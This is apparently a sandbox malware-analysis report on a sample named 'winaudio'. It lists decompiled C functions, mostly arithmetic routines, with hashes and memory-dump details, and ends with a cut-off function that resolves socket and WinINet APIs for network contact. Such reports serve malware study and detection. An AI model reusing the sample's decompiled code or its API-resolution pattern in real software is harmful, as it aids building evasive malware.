                        • Opcode ID: dd09723fc643d0e2ee6b257d94cca0fce2373df82c73f826f93028f387d61145
                        • Instruction ID: 47aeaaac46cadc797a226e4c34e547b17c64e59c69488b17d9ed8be6dbaff1af
                        • Opcode Fuzzy Hash: dd09723fc643d0e2ee6b257d94cca0fce2373df82c73f826f93028f387d61145
                        • Instruction Fuzzy Hash: 3DB14D72700B164BD728EEA9DC91796B3E3AB84326F8EC73C9046C6F55F2BCA4454680
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00325860 Relevance: .2, Instructions: 205COMMONCrypto
                        Download Yara Rule
                        C-Code - Quality: 100%
                        			E00325860(void* __edx) {
				signed int _t77;
				intOrPtr _t97;
				signed int* _t101;
				signed int _t106;
				signed int _t108;
				signed int _t114;
				signed int _t117;
				signed char _t120;
				signed int _t141;
				intOrPtr* _t144;
				signed int* _t145;
				signed int _t153;
				signed int _t157;
				signed int _t164;
				intOrPtr* _t168;
				signed int _t169;
				signed int _t180;
				signed int* _t182;
				signed int _t186;
				signed int _t188;
				signed int _t194;
				signed int _t197;
				signed int* _t199;
				void* _t201;

				E00397C10();
				_t77 =  *(_t201 + 0x28);
				_t197 =  *(_t201 + 0x34);
				_t186 =  *(_t201 + 0x44);
				_t114 = 1 << _t186;
				_t182 =  *(_t201 + 0x40);
				if(_t197 >  *((intOrPtr*)(_t77 + 8))) {
					_t77 = E002F9C20(__edx, _t77, _t197);
					_t201 = _t201 + 8;
				}
				if(_t77 != 0) {
					if(_t186 > 3) {
						_t120 = _t186 - 2;
						_t164 =  *(_t201 + 0x44) >> _t120;
						_t188 = 1 << _t120;
						 *(_t201 + 0x2c) = 1;
						_t21 = _t188 - 1; // 0x0
						 *(_t201 + 0x18) =  *(_t201 + 0x44) & _t21;
						 *(_t201 + 0x28) =  ~( ~(_t164 - 0x00000001 >> 0x0000001f &  !_t164 >> 0x0000001f) & 0x00000001);
						 *(_t201 + 0x24) =  ~( ~((_t164 ^ 0x00000001) - 0x00000001 >> 0x0000001f &  !(_t164 ^ 0x00000001) >> 0x0000001f) & 0x00000001);
						 *(_t201 + 0x20) =  ~( ~((_t164 ^ 0x00000002) - 0x00000001 >> 0x0000001f &  !(_t164 ^ 0x00000002) >> 0x0000001f) & 0x00000001);
						_t141 = 0;
						 *(_t201 + 0x14) = 0;
						 *(_t201 + 0x1c) =  ~( ~((_t164 ^ 0x00000003) - 0x00000001 >> 0x0000001f &  !(_t164 ^ 0x00000003) >> 0x0000001f) & 0x00000001);
						if(_t197 > 0) {
							 *(_t201 + 0x30) = _t114 << 2;
							do {
								_t169 = 0;
								_t117 = 0;
								 *(_t201 + 0x48) = 0;
								if(_t188 > 0) {
									_t145 = _t182 + _t188 * 8;
									_t101 =  &(_t182[_t188 + _t188 * 2]);
									 *(_t201 + 0x10) = _t145;
									_t199 =  &(_t182[_t188]);
									 *(_t201 + 0x40) = _t101;
									do {
										_t199 =  &(_t199[1]);
										_t53 = (_t117 ^  *(_t201 + 0x18)) - 1; // 0x324fb5
										_t106 = _t182[_t117] &  *(_t201 + 0x28) |  *(_t199 - 4) &  *(_t201 + 0x24) |  *_t145 &  *(_t201 + 0x20) |  *_t101 &  *(_t201 + 0x1c);
										_t188 =  *(_t201 + 0x2c);
										_t153 =  ~(_t53 >> 0x0000001f &  !(_t117 ^  *(_t201 + 0x18)) >> 0x0000001f) & 0x00000001;
										_t117 = _t117 + 1;
										_t169 =  *(_t201 + 0x48) |  ~_t153 & _t106;
										_t101 =  &(( *(_t201 + 0x40))[1]);
										_t145 =  &(( *(_t201 + 0x10))[1]);
										 *(_t201 + 0x48) = _t169;
										 *(_t201 + 0x40) = _t101;
										 *(_t201 + 0x10) = _t145;
									} while (_t117 < _t188);
									_t197 =  *(_t201 + 0x3c);
									_t141 =  *(_t201 + 0x14);
								}
								_t182 = _t182 +  *(_t201 + 0x30);
								 *( *((intOrPtr*)( *((intOrPtr*)(_t201 + 0x38)))) + _t141 * 4) = _t169;
								_t141 = _t141 + 1;
								 *(_t201 + 0x14) = _t141;
							} while (_t141 < _t197);
						}
					} else {
						_t157 = 0;
						 *(_t201 + 0x3c) = 0;
						if(_t197 > 0) {
							do {
								_t194 = 0;
								_t108 = 0;
								if(_t114 > 0) {
									do {
										_t180 =  ~( ~((_t108 ^  *(_t201 + 0x44)) - 0x00000001 >> 0x0000001f &  !(_t108 ^  *(_t201 + 0x44)) >> 0x0000001f) & 0x00000001) & _t182[_t108];
										_t108 = _t108 + 1;
										_t194 = _t194 | _t180;
									} while (_t108 < _t114);
									_t157 =  *(_t201 + 0x3c);
								}
								 *( *((intOrPtr*)( *((intOrPtr*)(_t201 + 0x38)))) + _t157 * 4) = _t194;
								_t157 = _t157 + 1;
								 *(_t201 + 0x3c) = _t157;
								_t182 =  &(_t182[_t114]);
							} while (_t157 < _t197);
						}
					}
					_t168 =  *((intOrPtr*)(_t201 + 0x38));
					 *(_t168 + 4) = _t197;
					if(_t197 > 0) {
						_t144 =  *_t168 + 0xfffffffc + _t197 * 4;
						while(1) {
							_t97 =  *_t144;
							_t144 = _t144 - 4;
							if(_t97 != 0) {
								break;
							}
							_t197 = _t197 - 1;
							if(_t197 > 0) {
								continue;
							}
							break;
						}
						 *(_t168 + 4) = _t197;
					}
					if( *(_t168 + 4) == 0) {
						 *((intOrPtr*)(_t168 + 0xc)) = 0;
					}
					return 1;
				} else {
					return _t77;
				}
			}



























                        0x00325865
                        0x0032586a
                        0x00325870
                        0x0032587a
                        0x00325880
                        0x00325883
                        0x0032588a
                        0x0032588e
                        0x00325893
                        0x00325893
                        0x00325898
                        0x003258a5
                        0x0032590c
                        0x0032590f
                        0x00325916
                        0x0032591c
                        0x00325920
                        0x00325927
                        0x00325944
                        0x00325964
                        0x00325989
                        0x0032598f
                        0x00325994
                        0x0032599a
                        0x003259a0
                        0x003259a9
                        0x003259b0
                        0x003259b0
                        0x003259b2
                        0x003259b4
                        0x003259ba
                        0x003259c3
                        0x003259c6
                        0x003259c9
                        0x003259cd
                        0x003259d0
                        0x003259d4
                        0x003259d6
                        0x003259fb
                        0x00325a06
                        0x00325a0e
                        0x00325a14
                        0x00325a17
                        0x00325a20
                        0x00325a22
                        0x00325a29
                        0x00325a2c
                        0x00325a30
                        0x00325a34
                        0x00325a38
                        0x00325a3c
                        0x00325a40
                        0x00325a40
                        0x00325a48
                        0x00325a4e
                        0x00325a51
                        0x00325a52
                        0x00325a56
                        0x003259b0
                        0x003258a7
                        0x003258a7
                        0x003258a9
                        0x003258af
                        0x003258b5
                        0x003258b5
                        0x003258b7
                        0x003258bb
                        0x003258c0
                        0x003258da
                        0x003258dd
                        0x003258de
                        0x003258e0
                        0x003258e4
                        0x003258e4
                        0x003258ee
                        0x003258f1
                        0x003258f9
                        0x003258fd
                        0x003258ff
                        0x00325903
                        0x003258af
                        0x00325a5e
                        0x00325a62
                        0x00325a67
                        0x00325a6e
                        0x00325a71
                        0x00325a71
                        0x00325a73
                        0x00325a78
                        0x00000000
                        0x00000000
                        0x00325a7a
                        0x00325a7d
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00325a7d
                        0x00325a7f
                        0x00325a7f
                        0x00325a86
                        0x00325a88
                        0x00325a88
                        0x00325a9b
                        0x0032589a
                        0x003258a1
                        0x003258a1

                        Memory Dump Source
                        • Source File: 00000000.00000002.508009909.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.507983807.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508826340.0000000000406000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508833220.0000000000407000.00000004.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_winaudio.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: d7c09b929184b9f663b43505bdafe7a4d0e75cf62351468cd08102c6ef891c79
                        • Instruction ID: 6eee3da996d27f119bb4b18c7d85e0b987b0fd8a03397f9687a8894df5ab2970
                        • Opcode Fuzzy Hash: d7c09b929184b9f663b43505bdafe7a4d0e75cf62351468cd08102c6ef891c79
                        • Instruction Fuzzy Hash: F371AD76A18B1A8FD709CF18D89166AF7E0FB89304F444A2DE586CB350DB75EA44CB81
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 002B321D Relevance: .1, Instructions: 144COMMONCrypto
                        Download Yara Rule
                        C-Code - Quality: 80%
                        			E002B321D(signed int __eax, intOrPtr* __ebx, void* __ecx, void* __edx, intOrPtr* __edi, void* __esi) {
				signed char _t40;
				signed char _t41;
				intOrPtr* _t53;
				void* _t61;
				void* _t71;
				intOrPtr* _t82;
				void* _t92;

				_t92 = __esi;
				_t82 = __edi;
				_t71 = __edx;
				_t61 = __ecx;
				_t53 = __ebx;
				asm("lodsb");
				_t40 = __eax & 0x000000c4;
				 *_t40 =  *_t40 + _t40;
				 *__ebx =  *__ebx + __ebx;
				asm("lodsb");
				_t41 = _t40 & 0x000000c8;
				 *_t41 =  *_t41 + _t41;
				 *__edi =  *__edi + __ecx;
			}










                        0x002b321d
                        0x002b321d
                        0x002b321d
                        0x002b321d
                        0x002b321d
                        0x002b321d
                        0x002b321e
                        0x002b3220
                        0x002b3222
                        0x002b3224
                        0x002b3225
                        0x002b3227
                        0x002b3229

                        Memory Dump Source
                        • Source File: 00000000.00000002.508009909.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.507983807.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508826340.0000000000406000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508833220.0000000000407000.00000004.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_winaudio.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 7843b180895422b3b0bcc0ba4a262943549954c7f4171b96b157888fc70d2e22
                        • Instruction ID: 8019a86cc89a33ac1a92ebc5e6dbcf7ce686f95378f58d6e3498235f16d88def
                        • Opcode Fuzzy Hash: 7843b180895422b3b0bcc0ba4a262943549954c7f4171b96b157888fc70d2e22
                        • Instruction Fuzzy Hash: 67519DF390D3985BD3249FA5CC8129AF3E0BFD8250F4B872DED84E7601EB7556419681
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 002BC770 Relevance: .1, Instructions: 112COMMON
                        Download Yara Rule
                        C-Code - Quality: 93%
                        			E002BC770(void* __eflags, signed int* _a4, signed int* _a8, signed int _a12) {
				signed int _t111;
				signed int _t112;
				signed int _t113;
				signed int _t114;
				signed int _t115;
				signed int _t116;
				signed int _t117;
				signed int _t118;
				signed int _t119;
				signed int _t121;
				signed int _t123;
				signed int _t125;
				signed int _t127;
				signed int _t129;
				signed int _t131;
				signed int _t133;
				signed int* _t134;
				signed int _t137;
				signed int _t139;
				signed int _t141;
				signed int _t142;
				signed int _t143;
				signed int _t144;
				signed int _t145;
				signed int _t147;
				signed int* _t163;
				signed int* _t165;
				signed int* _t168;

				_t111 = 0x3f0a10;
				asm("bt dword [eax], 0x1a");
				if(__eflags >= 0) {
					_t168 = _a4;
					_t165 = _a8;
					_t137 = _a12 & 0xfffffff8;
					__eflags = _t137;
					while(_t137 != 0) {
						_t119 =  *_t165;
						 *_t168 = _t119 * _t119;
						_t168[1] = _t119 * _t119 >> 0x20;
						_t121 = _t165[1];
						_t168[2] = _t121 * _t121;
						_t168[3] = _t121 * _t121 >> 0x20;
						_t123 = _t165[2];
						_t168[4] = _t123 * _t123;
						_t168[5] = _t123 * _t123 >> 0x20;
						_t125 = _t165[3];
						_t168[6] = _t125 * _t125;
						_t168[7] = _t125 * _t125 >> 0x20;
						_t127 = _t165[4];
						_t168[8] = _t127 * _t127;
						_t168[9] = _t127 * _t127 >> 0x20;
						_t129 = _t165[5];
						_t168[0xa] = _t129 * _t129;
						_t168[0xb] = _t129 * _t129 >> 0x20;
						_t131 = _t165[6];
						_t168[0xc] = _t131 * _t131;
						_t168[0xd] = _t131 * _t131 >> 0x20;
						_t133 = _t165[7];
						_t111 = _t133 * _t133;
						_t168[0xe] = _t111;
						_t168[0xf] = _t133 * _t133 >> 0x20;
						_t165 =  &(_t165[8]);
						_t168 =  &(_t168[0x10]);
						_t137 = _t137 - 8;
						__eflags = _t137;
					}
					_t139 = _a12 & 0x00000007;
					__eflags = _t139;
					if(_t139 != 0) {
						_t112 =  *_t165;
						_t111 = _t112 * _t112;
						 *_t168 = _t111;
						_t141 = _t139 - 1;
						__eflags = _t141;
						_t168[1] = _t112 * _t112 >> 0x20;
						if(_t141 != 0) {
							_t113 = _t165[1];
							_t111 = _t113 * _t113;
							_t168[2] = _t111;
							_t142 = _t141 - 1;
							__eflags = _t142;
							_t168[3] = _t113 * _t113 >> 0x20;
							if(_t142 != 0) {
								_t114 = _t165[2];
								_t111 = _t114 * _t114;
								_t168[4] = _t111;
								_t143 = _t142 - 1;
								__eflags = _t143;
								_t168[5] = _t114 * _t114 >> 0x20;
								if(_t143 != 0) {
									_t115 = _t165[3];
									_t111 = _t115 * _t115;
									_t168[6] = _t111;
									_t144 = _t143 - 1;
									__eflags = _t144;
									_t168[7] = _t115 * _t115 >> 0x20;
									if(_t144 != 0) {
										_t116 = _t165[4];
										_t111 = _t116 * _t116;
										_t168[8] = _t111;
										_t145 = _t144 - 1;
										__eflags = _t145;
										_t168[9] = _t116 * _t116 >> 0x20;
										if(_t145 != 0) {
											_t117 = _t165[5];
											_t111 = _t117 * _t117;
											_t168[0xa] = _t111;
											__eflags = _t145 != 1;
											_t168[0xb] = _t117 * _t117 >> 0x20;
											if(_t145 != 1) {
												_t118 = _t165[6];
												_t111 = _t118 * _t118;
												__eflags = _t111;
												_t168[0xc] = _t111;
												_t168[0xd] = _t118 * _t118 >> 0x20;
											}
										}
									}
								}
							}
						}
					}
					return _t111;
				} else {
					_t134 = _a4;
					_t163 = _a8;
					_t147 = _a12;
					goto L2;
					L2:
					asm("movd mm0, dword [edx]");
					asm("pmuludq mm0, mm0");
					_t163 =  &(_t163[1]);
					asm("movq [eax], mm0");
					_t147 = _t147 - 1;
					_t134 =  &(_t134[2]);
					if(_t147 != 0) {
						goto L2;
					} else {
						asm("emms");
						return _t134;
					}
				}
			}































                        0x002bc770
                        0x002bc776
                        0x002bc77a
                        0x002bc7b4
                        0x002bc7b8
                        0x002bc7c0
                        0x002bc7c0
                        0x002bc7c3
                        0x002bc7c9
                        0x002bc7cd
                        0x002bc7cf
                        0x002bc7d2
                        0x002bc7d7
                        0x002bc7da
                        0x002bc7dd
                        0x002bc7e2
                        0x002bc7e5
                        0x002bc7e8
                        0x002bc7ed
                        0x002bc7f0
                        0x002bc7f3
                        0x002bc7f8
                        0x002bc7fb
                        0x002bc7fe
                        0x002bc803
                        0x002bc806
                        0x002bc809
                        0x002bc80e
                        0x002bc811
                        0x002bc814
                        0x002bc817
                        0x002bc819
                        0x002bc81c
                        0x002bc81f
                        0x002bc822
                        0x002bc825
                        0x002bc825
                        0x002bc825
                        0x002bc832
                        0x002bc832
                        0x002bc835
                        0x002bc83b
                        0x002bc83d
                        0x002bc83f
                        0x002bc841
                        0x002bc841
                        0x002bc842
                        0x002bc845
                        0x002bc84b
                        0x002bc84e
                        0x002bc850
                        0x002bc853
                        0x002bc853
                        0x002bc854
                        0x002bc857
                        0x002bc85d
                        0x002bc860
                        0x002bc862
                        0x002bc865
                        0x002bc865
                        0x002bc866
                        0x002bc869
                        0x002bc86f
                        0x002bc872
                        0x002bc874
                        0x002bc877
                        0x002bc877
                        0x002bc878
                        0x002bc87b
                        0x002bc881
                        0x002bc884
                        0x002bc886
                        0x002bc889
                        0x002bc889
                        0x002bc88a
                        0x002bc88d
                        0x002bc893
                        0x002bc896
                        0x002bc898
                        0x002bc89b
                        0x002bc89c
                        0x002bc89f
                        0x002bc8a5
                        0x002bc8a8
                        0x002bc8a8
                        0x002bc8aa
                        0x002bc8ad
                        0x002bc8ad
                        0x002bc89f
                        0x002bc88d
                        0x002bc87b
                        0x002bc869
                        0x002bc857
                        0x002bc845
                        0x002bc8b4
                        0x002bc780
                        0x002bc780
                        0x002bc784
                        0x002bc788
                        0x002bc788
                        0x002bc790
                        0x002bc790
                        0x002bc793
                        0x002bc796
                        0x002bc799
                        0x002bc79c
                        0x002bc79f
                        0x002bc7a2
                        0x00000000
                        0x002bc7a8
                        0x002bc7a8
                        0x002bc7aa
                        0x002bc7aa
                        0x002bc7a2

                        Memory Dump Source
                        • Source File: 00000000.00000002.508009909.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.507983807.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508826340.0000000000406000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508833220.0000000000407000.00000004.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_winaudio.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 49d74d6a61318fcede18d4759270e0f84658dfaff99c390f993eefb26ca995c2
                        • Instruction ID: 04097d2ba9d7d026a1d30f9d45fab71b0b139143565f73a5718ccdd2b8a4085d
                        • Opcode Fuzzy Hash: 49d74d6a61318fcede18d4759270e0f84658dfaff99c390f993eefb26ca995c2
                        • Instruction Fuzzy Hash: EA4160B1910B029FD365CF2EC285552FBF4FB983507508A2A9499CBB20E731B994CF90
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0037CCB0 Relevance: .1, Instructions: 76COMMONCrypto
                        Download Yara Rule
                        C-Code - Quality: 100%
                        			E0037CCB0(signed int _a4, signed char _a8, intOrPtr _a12) {
				intOrPtr _t13;
				void* _t14;
				signed char _t20;
				signed char _t24;
				signed int _t27;
				signed char _t32;
				unsigned int _t33;
				signed char _t35;
				signed char _t37;
				signed int _t39;

				_t13 = _a12;
				if(_t13 == 0) {
					L11:
					return _t13;
				} else {
					_t39 = _a4;
					_t20 = _a8;
					if((_t39 & 0x00000003) == 0) {
						L5:
						_t14 = _t13 - 4;
						if(_t14 < 0) {
							L8:
							_t13 = _t14 + 4;
							if(_t13 == 0) {
								goto L11;
							} else {
								while(1) {
									_t24 =  *_t39;
									_t39 = _t39 + 1;
									if((_t24 ^ _t20) == 0) {
										goto L20;
									}
									_t13 = _t13 - 1;
									if(_t13 != 0) {
										continue;
									} else {
										goto L11;
									}
									goto L24;
								}
								goto L20;
							}
						} else {
							_t20 = ((_t20 << 8) + _t20 << 0x10) + (_t20 << 8) + _t20;
							do {
								_t27 =  *_t39 ^ _t20;
								_t39 = _t39 + 4;
								if(((_t27 ^ 0xffffffff ^ 0x7efefeff + _t27) & 0x81010100) == 0) {
									goto L12;
								} else {
									_t32 =  *(_t39 - 4) ^ _t20;
									if(_t32 == 0) {
										_t12 = _t39 - 4; // -12
										return _t12;
									} else {
										_t33 = _t32 ^ _t20;
										if(_t33 == 0) {
											_t11 = _t39 - 3; // -11
											return _t11;
										} else {
											_t35 = _t33 >> 0x00000010 ^ _t20;
											if(_t35 == 0) {
												_t10 = _t39 - 2; // -10
												return _t10;
											} else {
												if((_t35 ^ _t20) == 0) {
													goto L20;
												} else {
													goto L12;
												}
											}
										}
									}
								}
								goto L24;
								L12:
								_t14 = _t14 - 4;
							} while (_t14 >= 0);
							goto L8;
						}
					} else {
						while(1) {
							_t37 =  *_t39;
							_t39 = _t39 + 1;
							if((_t37 ^ _t20) == 0) {
								break;
							}
							_t13 = _t13 - 1;
							if(_t13 == 0) {
								goto L11;
							} else {
								if((_t39 & 0x00000003) != 0) {
									continue;
								} else {
									goto L5;
								}
							}
							goto L24;
						}
						L20:
						_t9 = _t39 - 1; // -9
						return _t9;
					}
				}
				L24:
			}













                        0x0037ccb0
                        0x0037ccb7
                        0x0037cd0c
                        0x0037cd0c
                        0x0037ccb9
                        0x0037ccb9
                        0x0037ccbf
                        0x0037ccc9
                        0x0037cce1
                        0x0037cce1
                        0x0037cce4
                        0x0037ccf8
                        0x0037ccf8
                        0x0037ccfb
                        0x00000000
                        0x0037ccfd
                        0x0037ccfd
                        0x0037ccfd
                        0x0037ccff
                        0x0037cd04
                        0x00000000
                        0x00000000
                        0x0037cd06
                        0x0037cd09
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x0037cd09
                        0x00000000
                        0x0037ccfd
                        0x0037cce6
                        0x0037ccf3
                        0x0037cd12
                        0x0037cd14
                        0x0037cd22
                        0x0037cd2b
                        0x00000000
                        0x0037cd2d
                        0x0037cd30
                        0x0037cd32
                        0x0037cd57
                        0x0037cd5c
                        0x0037cd34
                        0x0037cd34
                        0x0037cd36
                        0x0037cd51
                        0x0037cd56
                        0x0037cd38
                        0x0037cd3b
                        0x0037cd3d
                        0x0037cd4b
                        0x0037cd50
                        0x0037cd3f
                        0x0037cd41
                        0x00000000
                        0x0037cd43
                        0x00000000
                        0x0037cd43
                        0x0037cd41
                        0x0037cd3d
                        0x0037cd36
                        0x0037cd32
                        0x00000000
                        0x0037cd0d
                        0x0037cd0d
                        0x0037cd0d
                        0x00000000
                        0x0037ccf7
                        0x0037cccb
                        0x0037cccb
                        0x0037cccb
                        0x0037cccd
                        0x0037ccd2
                        0x00000000
                        0x00000000
                        0x0037ccd4
                        0x0037ccd7
                        0x00000000
                        0x0037ccd9
                        0x0037ccdf
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x0037ccdf
                        0x00000000
                        0x0037ccd7
                        0x0037cd46
                        0x0037cd46
                        0x0037cd4a
                        0x0037cd4a
                        0x0037ccc9
                        0x00000000

                        Memory Dump Source
                        • Source File: 00000000.00000002.508009909.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.507983807.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508826340.0000000000406000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508833220.0000000000407000.00000004.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_winaudio.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                        • Instruction ID: 90d32aaccd124532041434bbe637a968193a2c00e0d4680709ebe497a98d4d9b
                        • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                        • Instruction Fuzzy Hash: D0113BB722004243D637862DD4B46B6DB95EBC632072EE27ED44E4B758D22AD942D600
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 002B11E0 Relevance: .0, Instructions: 7COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.508009909.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.507983807.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508826340.0000000000406000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508833220.0000000000407000.00000004.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_winaudio.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 17e8c1c5b9c2f5519f42bbbffdf58cf34eef8e57a159942630bb6cbf1a18f864
                        • Instruction ID: a003bd78a0fafd4e2f7aae065ed1620529c6820b3709b5dd21ddf707e9630218
                        • Opcode Fuzzy Hash: 17e8c1c5b9c2f5519f42bbbffdf58cf34eef8e57a159942630bb6cbf1a18f864
                        • Instruction Fuzzy Hash: 45B012355202004B5B0BCA2CDC215E233B67391300B59C8A4D00345015D6369031C900
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0037A4C0 Relevance: 66.6, APIs: 19, Strings: 19, Instructions: 130libraryloaderCOMMON
                        Download Yara Rule
                        C-Code - Quality: 100%
                        			E0037A4C0() {
				struct HINSTANCE__* _t2;
				struct HINSTANCE__* _t4;
				struct HINSTANCE__* _t5;
				_Unknown_base(*)()* _t15;
				_Unknown_base(*)()* _t20;
				_Unknown_base(*)()* _t21;

				if( *0x3ee024 != 1) {
					E0037A1A0();
					 *0x3ee038 = 0;
					_t2 = LoadLibraryW(L"Kernel32.dll");
					 *0x3edfb8 = _t2;
					if(_t2 == 0) {
						L22:
						return 0;
					} else {
						_t4 = LoadLibraryW(L"WS2_32.dll");
						 *0x3edfd0 = _t4;
						if(_t4 == 0) {
							goto L22;
						} else {
							_t5 = LoadLibraryW(L"Wininet.dll");
							 *0x3edfc0 = _t5;
							if(_t5 == 0) {
								goto L22;
							} else {
								 *0x3ee038 = 0;
								 *0x3edfe0 = GetProcAddress( *0x3edfd0, "send");
								 *0x3edfe4 = GetProcAddress( *0x3edfd0, "recv");
								 *0x3edfe8 = GetProcAddress( *0x3edfd0, "closesocket");
								 *0x3edfec = GetProcAddress( *0x3edfd0, "socket");
								 *0x3edff0 = GetProcAddress( *0x3edfd0, "gethostbyname");
								 *0x3edff4 = GetProcAddress( *0x3edfd0, "htons");
								 *0x3edff8 = GetProcAddress( *0x3edfd0, "WSAStartup");
								 *0x3edffc = GetProcAddress( *0x3edfd0, "setsockopt");
								 *0x3ee000 = GetProcAddress( *0x3edfd0, "inet_addr");
								_t15 = GetProcAddress( *0x3edfd0, "connect");
								 *0x3ee004 = _t15;
								if( *0x3edfe0 == 0 ||  *0x3edfe4 == 0 ||  *0x3edfe8 == 0 ||  *0x3edfec == 0 ||  *0x3edff0 == 0 ||  *0x3edff4 == 0 ||  *0x3edff8 == 0 ||  *0x3edffc == 0 ||  *0x3ee000 == 0 || _t15 == 0) {
									goto L22;
								} else {
									 *0x3ee038 = 0;
									 *0x3ee008 = GetProcAddress( *0x3edfc0, "InternetOpenA");
									 *0x3ee00c = GetProcAddress( *0x3edfc0, "InternetOpenUrlA");
									 *0x3ee010 = GetProcAddress( *0x3edfc0, "InternetReadFile");
									 *0x3ee014 = GetProcAddress( *0x3edfc0, "InternetCloseHandle");
									_t20 = GetProcAddress( *0x3edfc0, "HttpQueryInfoA");
									 *0x3ee018 = _t20;
									if( *0x3ee008 == 0 ||  *0x3ee00c == 0 ||  *0x3ee010 == 0 ||  *0x3ee014 == 0 || _t20 == 0) {
										goto L22;
									} else {
										_t21 = GetProcAddress( *0x3edfb8, "GetNativeSystemInfo");
										 *0x3ee01c = _t21;
										if(_t21 == 0) {
											goto L22;
										} else {
											 *0x3ee038 = 0x6f97;
											 *0x3ee024 = 1;
											return 1;
										}
									}
								}
							}
						}
					}
				} else {
					return 1;
				}
			}









                        0x0037a4c7
                        0x0037a4cd
                        0x0037a4dd
                        0x0037a4e7
                        0x0037a4e9
                        0x0037a4f0
                        0x0037a719
                        0x0037a71c
                        0x0037a4f6
                        0x0037a4fb
                        0x0037a4fd
                        0x0037a504
                        0x00000000
                        0x0037a50a
                        0x0037a50f
                        0x0037a511
                        0x0037a518
                        0x00000000
                        0x0037a51e
                        0x0037a52f
                        0x0037a546
                        0x0037a558
                        0x0037a56a
                        0x0037a57c
                        0x0037a58e
                        0x0037a5a0
                        0x0037a5b2
                        0x0037a5c4
                        0x0037a5d6
                        0x0037a5db
                        0x0037a5e4
                        0x0037a5e9
                        0x00000000
                        0x0037a65f
                        0x0037a66a
                        0x0037a681
                        0x0037a693
                        0x0037a6a5
                        0x0037a6b7
                        0x0037a6bc
                        0x0037a6c5
                        0x0037a6ca
                        0x00000000
                        0x0037a6eb
                        0x0037a6f6
                        0x0037a6f8
                        0x0037a6ff
                        0x00000000
